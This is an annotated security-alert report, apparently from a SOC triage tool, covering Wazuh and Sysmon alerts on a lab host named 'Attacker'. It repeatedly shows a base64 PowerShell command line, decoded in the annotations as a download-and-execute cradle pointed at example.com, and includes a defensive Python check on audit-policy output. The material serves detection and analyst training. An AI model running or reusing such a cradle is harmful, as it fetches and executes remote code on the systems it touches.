data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:28.089 ProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00} ProcessId: 15520 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00} ParentProcessId: 12304 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:28.089
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda0-680a-a60b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd9c-680a-a40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:32.779+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:32.779+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  93
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534372.1853162
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:30.2971724Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285328
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:30.274 ProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00} ProcessId: 15520 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ulxacboz.arb.ps1 CreationUtcTime: 2025-04-24 22:39:30.274 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:30.274
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda0-680a-a60b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ulxacboz.arb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:30.274
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:39:35.428+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:35.428+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
CIS Critical Security Controls safeguard this check supports (8.5 = Collect Detailed Audit Logs in CIS Controls v8).

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534375.1855931
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
SCA event type: check = the result of one benchmark check (this event); summary = the pass/fail totals for a whole scan run.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26160
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Removable Storage' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated only for all objects for all types of access requested. If you configure this policy setting, an audit event is generated each time an account accesses a file system object on a removable storage. Success audits record successful attempts and Failure audits record unsuccessful attempts. If you do not configure this policy setting, no audit event is generated when an account accesses a file system object on a removable storage. The recommended state for this setting is: Success and Failure. Note: A Windows 8.0, Server 2012 (non-R2) or newer OS is required to access and set this value in Group Policy.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing removable storage may be useful when investigating an incident. For example, if an individual is suspected of copying sensitive information onto a USB drive.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Removable Storage
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.4
Section of the CIS Windows 11 benchmark this check implements (17.6 = Object Access audit policies); same value as rule.cis above.

data.sca.check.compliance.cis_csc:  8.5
CIS Critical Security Controls safeguard (8.5 = Collect Detailed Audit Logs in v8); same value as rule.cis_csc above.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Removable Storage"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
One of passed, failed or not applicable. Not applicable is not a pass: here it means the check could not be evaluated at all (see data.sca.check.reason), so the control state is unknown and the previous 'failed' should be assumed to still hold.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Removable Storage"'
Why the check produced no result. The agent's auditpol.exe call exceeded the SCA command timeout, so no output was collected; re-run the command by hand on the host to get a real answer.

data.sca.check.previous_result:  failed
Result of the previous scan run, used to spot drift. The transition failed -> not applicable is what fired this alert; nothing on the host was remediated.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.
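A worked evaluation of the check above, added here as an example (it is not Wazuh SCA code and not part of SOCscribe). It parses the output of the command the check ran, auditpol.exe /get /subcategory:"Removable Storage", against the benchmark's recommended state and, as the timeout on this host shows is needed, reports a command that produced nothing as indeterminate rather than as a pass. The auditpol text in the block is a constructed sample in the layout auditpol /get prints, not output captured from the host; run_check() executes the real command and is Windows-only.

```python
"""Evaluate the CIS 'Audit Removable Storage' check from auditpol output and
treat a command that produced nothing as indeterminate. Added example; not
Wazuh SCA or SOCscribe code."""
import re
import subprocess
from typing import Optional

# The command the SCA check ran (data.sca.check.command). In list form the
# subcategory needs no shell quoting.
CHECK_COMMAND = ["auditpol.exe", "/get", "/subcategory:Removable Storage"]
SUBCATEGORY = "Removable Storage"
EXPECTED = "Success and Failure"   # the benchmark's recommended state

# Constructed samples in the layout auditpol /get prints (not captured from the host).
SAMPLE_PASSED = (
    "System audit policy\n"
    "Category/Subcategory                      Setting\n"
    "Object Access\n"
    "  Removable Storage                       Success and Failure\n"
)
SAMPLE_FAILED = SAMPLE_PASSED.replace("Success and Failure", "No Auditing")


def parse_setting(output: str, subcategory: str = SUBCATEGORY) -> Optional[str]:
    """Pull the Setting column for one subcategory line; None if absent."""
    pattern = re.compile(r"^\s*" + re.escape(subcategory) + r"\s{2,}(.+?)\s*$")
    for line in output.splitlines():
        m = pattern.match(line)
        if m:
            return m.group(1)
    return None


def evaluate(output: Optional[str], reason: Optional[str] = None) -> dict:
    """Map auditpol output to the SCA-style result. output=None means the
    command produced nothing (timeout, crash, missing binary): that is
    'not applicable' with a reason, never a pass."""
    if output is None:
        return {"result": "not applicable", "setting": None, "reason": reason or "no output"}
    setting = parse_setting(output)
    if setting is None:
        return {"result": "not applicable", "setting": None,
                "reason": f"'{SUBCATEGORY}' not present in output"}
    return {"result": "passed" if setting == EXPECTED else "failed",
            "setting": setting, "reason": None}


def run_check(timeout_s: float = 30.0) -> dict:
    """Run the real command (Windows only) with a hard timeout."""
    try:
        proc = subprocess.run(CHECK_COMMAND, capture_output=True, text=True, timeout=timeout_s)
    except subprocess.TimeoutExpired:
        return evaluate(None, f"timeout after {timeout_s}s running {' '.join(CHECK_COMMAND)}")
    except FileNotFoundError:
        return evaluate(None, "auditpol.exe not found: not a Windows host")
    return evaluate(proc.stdout)


if __name__ == "__main__":
    print(run_check())
```

The point of the three-way result is the one this alert illustrates: a scanner that cannot run its command must say so, and whoever reads the report must keep the last real result ('failed') as the working assumption until the command succeeds.
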

🎯 Recommended Actions

Do not close this as remediated. The status moved to 'not applicable' because the agent's auditpol.exe call timed out (data.sca.check.reason), not because the setting changed; the last real result was 'failed', so assume Removable Storage auditing is still off.
Run auditpol.exe /get /subcategory:"Removable Storage" by hand on host Attacker (192.168.6.131). If it does not report Success and Failure, apply the Group Policy path in data.sca.check.remediation and re-scan.
Note the timing: the timeout hit at 22:39:35 on the same agent that was spawning powershell.exe repeatedly in the alerts that follow. A host busy enough to starve a scan command for its full timeout deserves a look on its own.

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:35.647+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:35.647+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  90
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534375.1859856
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Sysmon events carry their own schema (ProcessGuid, Hashes, Parent* fields), so do not read them with Security-log (4688) expectations.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the provider above. It is the same on every host running Sysmon, which makes it a stable filter key.

data.win.system.eventID:  1
Event ID within the provider. For Sysmon: 1 = Process Create, 11 = File Create; these are not the Security-log numbers (4624, 4688).

data.win.system.version:  5
Schema version of this event type. Newer Sysmon releases add fields to the same Event ID (this version carries ParentUser), so position-based parsers must check it.

data.win.system.level:  4
Windows event level; 4 = Informational. Sysmon logs everything at this level, so the severity here comes from the Wazuh rule, not from Windows.

data.win.system.task:  1
Windows task category number; Sysmon sets it equal to the Event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:33.0039060Z
When the record was written to the event log. It trails eventdata.utcTime (22:39:31.869, when Sysmon saw the process start) by about a second here, and the Wazuh timestamp above (arrival at the manager) is later still; order events by utcTime.

data.win.system.eventRecordID:  285351
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry, i.e. the Sysmon service, not the process the event describes (that is eventdata.processId).

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process; ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record was read from. The Wazuh agent's eventchannel collector must subscribe to this channel for any Sysmon alert to exist.

data.win.system.computer:  Attacker
Host name stamped into the event. It should match agent.name; if it does not, the record was forwarded from another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:31.869 ProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00} ProcessId: 6888 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00} ParentProcessId: 15520 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered event text; the eventdata.* fields below are this string parsed into key/value pairs. Read the CommandLine here if a parsed copy ever looks truncated: it is powershell.exe given a second powershell.exe path as its first argument, then -NoLogo -NoProfile -EncodedCommand <base64>.

data.win.eventdata.utcTime:  2025-04-24 22:39:31.869
When Sysmon observed the process start (UTC). This is the authoritative time for ordering; it precedes both systemTime and the Wazuh timestamp.

data.win.eventdata.processGuid:  {94294ddc-bda3-680a-a80b-000000000e00}
Sysmon's per-process-instance GUID for PID 6888. Join key for everything this process does: the File Create that follows and the Process Create of PID 9052 both carry this value.

data.win.eventdata.processId:  6888
Windows PID. Reused after the process exits, so join on the GUID, not on this.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started: Windows PowerShell 5.1 from System32.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the image (build 26100 = Windows 11 24H2). Use it to pick the right known-good copy when comparing the hash below.

data.win.eventdata.description:  Windows PowerShell
String from the PE version resource. Trivial to forge in a custom binary; corroborate with the hash and a signature check rather than trusting it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; same caveat as description.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; same caveat as description.

data.win.eventdata.originalFileName:  PowerShell.EXE
File name compiled into the version resource. Compare with the basename of image: a mismatch means the binary was renamed on disk, a common evasion. Here both are powershell.exe.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line. -EncodedCommand takes base64 over the UTF-16LE text of the script, so decode it before judging the alert; this one decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. The first argument is itself a powershell.exe path, and the same doubled command line appears unchanged on the parent and on the child this process spawns next, so treat it as a self-replicating launcher and look for its root.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process (the user's profile root); relative paths in the decoded script resolve from here.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as: local account Attcker1 on host Attacker.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's GUID for the logon session the process belongs to; constant across every process started from that session.

data.win.eventdata.logonId:  0x26584
Windows logon session ID (LUID). Match it against the Logon ID in Security Event 4624 to see how and when Attcker1 authenticated. All three PowerShell generations in this report share this value.

data.win.eventdata.terminalSessionId:  1
Windows session number. Session 0 hosts services; 1 here is an interactive desktop session (console or RDP), so a logged-on user context was involved.

data.win.eventdata.integrityLevel:  Medium
Token integrity level. Medium = standard, non-elevated user; High would be an elevated administrator, System a service. This cradle is running without admin rights.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file in the algorithms Sysmon is configured for (SHA256 only here). The same value appears on every powershell.exe event in this report, so one file on disk is being executed; compare it with a trusted copy of file version 10.0.26100.3323 before ruling out tampering.

data.win.eventdata.parentProcessGuid:  {94294ddc-bda0-680a-a60b-000000000e00}
GUID of the parent process. This is PID 15520, the PowerShell instance that wrote the first __PSScriptPolicyTest file at 22:39:30 in this report.

data.win.eventdata.parentProcessId:  15520
PID of the parent; subject to reuse, so rely on parentProcessGuid.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent: also Windows PowerShell.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's command line, byte-for-byte identical to this process's own, encoded cradle included.

data.win.eventdata.parentUser:  Attacker\\Attcker1
